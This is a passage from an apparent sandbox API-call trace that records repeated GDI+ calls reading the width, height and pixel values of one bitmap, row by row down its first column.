GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.231] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.231] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=36, color=0x1eed00) returned 0x0 [0119.231] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.231] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.231] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=37, color=0x1eed00) returned 0x0 [0119.231] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.231] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.231] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=38, color=0x1eed00) returned 0x0 [0119.232] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.232] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.232] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=39, color=0x1eed00) returned 0x0 [0119.232] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.232] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.232] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=40, color=0x1eed00) returned 0x0 [0119.232] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.232] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.232] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=41, color=0x1eed00) returned 0x0 [0119.232] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.232] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.232] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=42, color=0x1eed00) returned 0x0 [0119.232] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.232] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.233] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=43, color=0x1eed00) returned 0x0 [0119.233] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.233] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.233] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=44, color=0x1eed00) returned 0x0 [0119.233] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.233] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.233] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=45, color=0x1eed00) returned 0x0 [0119.233] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.233] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.233] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=46, color=0x1eed00) returned 0x0 [0119.233] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.233] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.233] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=47, color=0x1eed00) returned 0x0 [0119.233] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.233] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.233] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=48, color=0x1eed00) returned 0x0 [0119.234] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.234] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.234] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=49, color=0x1eed00) returned 0x0 [0119.234] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.234] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.235] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=50, color=0x1eed00) returned 0x0 [0119.235] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.235] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.235] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=51, color=0x1eed00) returned 0x0 [0119.235] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.235] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.236] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=52, color=0x1eed00) returned 0x0 [0119.236] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.236] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.236] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=53, color=0x1eed00) returned 0x0 [0119.236] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.236] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.236] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=54, color=0x1eed00) returned 0x0 [0119.236] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.236] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.236] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=55, color=0x1eed00) returned 0x0 [0119.236] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.236] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.236] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=56, color=0x1eed00) returned 0x0 [0119.236] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.236] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.236] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=57, color=0x1eed00) returned 0x0 [0119.237] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.237] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.237] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=58, color=0x1eed00) returned 0x0 [0119.237] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.237] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.237] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=59, color=0x1eed00) returned 0x0 [0119.237] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.237] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.237] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=60, color=0x1eed00) returned 0x0 [0119.237] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.237] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.237] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=61, color=0x1eed00) returned 0x0 [0119.237] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.237] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.237] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=62, color=0x1eed00) returned 0x0 [0119.238] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.238] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.238] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=63, color=0x1eed00) returned 0x0 [0119.238] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.238] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.238] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=64, color=0x1eed00) returned 0x0 [0119.238] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.238] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.238] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=65, color=0x1eed00) returned 0x0 [0119.238] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.238] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.238] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=66, color=0x1eed00) returned 0x0 [0119.238] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.238] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.238] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=67, color=0x1eed00) returned 0x0 [0119.238] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.239] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.239] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=68, color=0x1eed00) returned 0x0 [0119.239] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.239] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.239] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=69, color=0x1eed00) returned 0x0 [0119.239] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.239] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.239] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=70, color=0x1eed00) returned 0x0 [0119.239] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.239] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.239] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=71, color=0x1eed00) returned 0x0 [0119.239] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.239] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.239] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=72, color=0x1eed00) returned 0x0 [0119.239] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.239] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.240] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=73, color=0x1eed00) returned 0x0 [0119.240] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.240] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.240] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=74, color=0x1eed00) returned 0x0 [0119.240] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.240] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.240] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=75, color=0x1eed00) returned 0x0 [0119.240] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.240] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.240] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=76, color=0x1eed00) returned 0x0 [0119.240] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.240] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.240] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=77, color=0x1eed00) returned 0x0 [0119.240] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.240] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.240] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=78, color=0x1eed00) returned 0x0 [0119.241] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.241] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.241] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=79, color=0x1eed00) returned 0x0 [0119.241] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.241] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.241] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=80, color=0x1eed00) returned 0x0 [0119.241] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.241] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.241] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=81, color=0x1eed00) returned 0x0 [0119.241] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.241] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.241] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=82, color=0x1eed00) returned 0x0 [0119.241] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.241] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.241] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=83, color=0x1eed00) returned 0x0 [0119.241] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.242] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.242] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=84, color=0x1eed00) returned 0x0 [0119.242] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.242] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.242] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=85, color=0x1eed00) returned 0x0 [0119.242] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.242] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.242] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=86, color=0x1eed00) returned 0x0 [0119.242] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.243] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.243] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=87, color=0x1eed00) returned 0x0 [0119.243] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.243] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.243] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=88, color=0x1eed00) returned 0x0 [0119.243] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.243] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.243] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=89, color=0x1eed00) returned 0x0 [0119.243] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.243] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.243] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=90, color=0x1eed00) returned 0x0 [0119.243] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.244] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.244] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=91, color=0x1eed00) returned 0x0 [0119.244] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.244] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.244] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=92, color=0x1eed00) returned 0x0 [0119.244] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.244] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.244] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=93, color=0x1eed00) returned 0x0 [0119.244] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.244] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.244] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=94, color=0x1eed00) returned 0x0 [0119.244] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.245] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.245] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=95, color=0x1eed00) returned 0x0 [0119.245] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.245] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.245] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=96, color=0x1eed00) returned 0x0 [0119.245] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.245] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.245] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=97, color=0x1eed00) returned 0x0 [0119.245] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.245] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.245] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=98, color=0x1eed00) returned 0x0 [0119.245] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.246] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.246] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=99, color=0x1eed00) returned 0x0 [0119.246] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.246] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.246] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=100, color=0x1eed00) returned 0x0 [0119.246] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.246] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.246] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=101, color=0x1eed00) returned 0x0 [0119.246] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.246] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.246] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=102, color=0x1eed00) returned 0x0 [0119.246] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.247] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.247] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=103, color=0x1eed00) returned 0x0 [0119.247] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.247] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.247] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=104, color=0x1eed00) returned 0x0 [0119.247] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.247] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.247] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=105, color=0x1eed00) returned 0x0 [0119.247] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.247] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.247] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=106, color=0x1eed00) returned 0x0 [0119.247] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.248] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.248] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=107, color=0x1eed00) returned 0x0 [0119.248] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.248] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.248] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=108, color=0x1eed00) returned 0x0 [0119.248] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.248] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.248] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=109, color=0x1eed00) returned 0x0 [0119.248] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.248] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.248] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=110, color=0x1eed00) returned 0x0 [0119.249] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.249] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.249] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=111, color=0x1eed00) returned 0x0 [0119.249] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.249] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.249] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=112, color=0x1eed00) returned 0x0 [0119.249] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.249] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.249] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=113, color=0x1eed00) returned 0x0 [0119.249] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.249] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.249] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=114, color=0x1eed00) returned 0x0 [0119.250] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.250] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.250] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=115, color=0x1eed00) returned 0x0 [0119.250] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.250] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.250] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=116, color=0x1eed00) returned 0x0 [0119.250] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.250] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.250] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=117, color=0x1eed00) returned 0x0 [0119.251] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.251] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.251] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=118, color=0x1eed00) returned 0x0 [0119.251] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.251] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.251] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=119, color=0x1eed00) returned 0x0 [0119.251] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.251] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.251] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=120, color=0x1eed00) returned 0x0 [0119.251] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.251] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.251] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=121, color=0x1eed00) returned 0x0 [0119.252] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.252] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.252] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=122, color=0x1eed00) returned 0x0 [0119.252] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.252] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.252] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=123, color=0x1eed00) returned 0x0 [0119.252] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.252] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.252] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=124, color=0x1eed00) returned 0x0 [0119.252] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.252] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.252] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=125, color=0x1eed00) returned 0x0 [0119.253] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.253] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.253] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=126, color=0x1eed00) returned 0x0 [0119.253] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.253] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.253] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=127, color=0x1eed00) returned 0x0 [0119.253] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.253] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.253] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=128, color=0x1eed00) returned 0x0 [0119.253] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.253] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.253] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=129, color=0x1eed00) returned 0x0 [0119.254] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.254] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.254] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=130, color=0x1eed00) returned 0x0 [0119.254] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.254] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.254] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=131, color=0x1eed00) returned 0x0 [0119.254] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.254] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.254] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=132, color=0x1eed00) returned 0x0 [0119.254] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.254] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.255] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=133, color=0x1eed00) returned 0x0 [0119.255] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.255] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.255] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=134, color=0x1eed00) returned 0x0 [0119.255] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.255] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.255] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=135, color=0x1eed00) returned 0x0 [0119.255] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.255] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.255] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=136, color=0x1eed00) returned 0x0 [0119.255] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.255] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.256] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=137, color=0x1eed00) returned 0x0 [0119.256] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.256] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.256] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=138, color=0x1eed00) returned 0x0 [0119.256] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.256] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.256] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=139, color=0x1eed00) returned 0x0 [0119.256] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.256] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.256] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=140, color=0x1eed00) returned 0x0 [0119.256] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.257] GdipGetImageHeight (image=0x52d2230, height=0x1eecf0) returned 0x0 [0119.257] GdipBitmapGetPixel (bitmap=0x52d2230, x=0, y=141, color=0x1eed00) returned 0x0 [0119.257] GdipGetImageWidth (image=0x52d2230, width=0x1eecf0) returned 0x0 [0119.257] GdipGetImageHeight 